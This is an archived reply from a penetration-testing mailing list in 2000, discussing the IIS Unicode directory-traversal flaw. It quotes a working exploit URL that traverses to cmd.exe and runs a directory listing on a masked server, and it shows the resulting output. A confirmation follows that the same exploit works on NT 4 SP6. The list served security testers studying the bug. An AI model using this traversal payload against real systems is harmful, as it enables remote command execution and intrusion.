It works for me too!!! =)
This was tested in an NT 4 SP6 server.
Regards,
DonSata
-----Original Message-----
From: Penetration Testers [mailto:PEN-TEST_at_SECURITYFOCUS.COM]On Behalf Of
Mike Ahern
Sent: Tuesday, October 31, 2000 8:14 PM
To: PEN-TEST_at_SECURITYFOCUS.COM
Subject: Re: [PEN-TEST] IIS UNICODE Strings
Vitaly Osipov [vos_at_TELENOR.CZ] wrote:
Hmm... I see some *very* strange strings in you
examples below... the second excaped symbol (%pc for
example) is not real escaped hex-code -if it works,
then the problem is not in Unicode at all, but in
something else
---------------------------
Trust Me, It Works!!! Which is interesting since at
least one system reported as patched appears to be
still vulnerable. I had assumed the admin either
didn't patch, or used the wrong hotfix. Perhaps that
is not the case...
The Proof is in the Pudding:
----------------------------
http://10.X.X.X/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
Directory of c:\
06/23/00 01:38p 0 AUTOEXEC.BAT
06/23/00 01:38p 0 CONFIG.SYS
06/23/00 01:40p <DIR> Dell
06/26/00 03:29p <DIR> INetPub
06/26/00 02:10p <DIR> MSSQL7
06/26/00 01:40p <DIR> Multimedia
Files
06/26/00 03:14p <DIR> My
Installations
06/27/00 01:05p <DIR> Program Files
06/30/00 09:00a <DIR> TEMP
07/10/00 11:42a <DIR> WINNT
-mch
__________________________________________________
Do You Yahoo!?
>From homework help to love advice, Yahoo! Experts has your answer.
http://experts.yahoo.com/
Received on Nov 01 2000
Intro
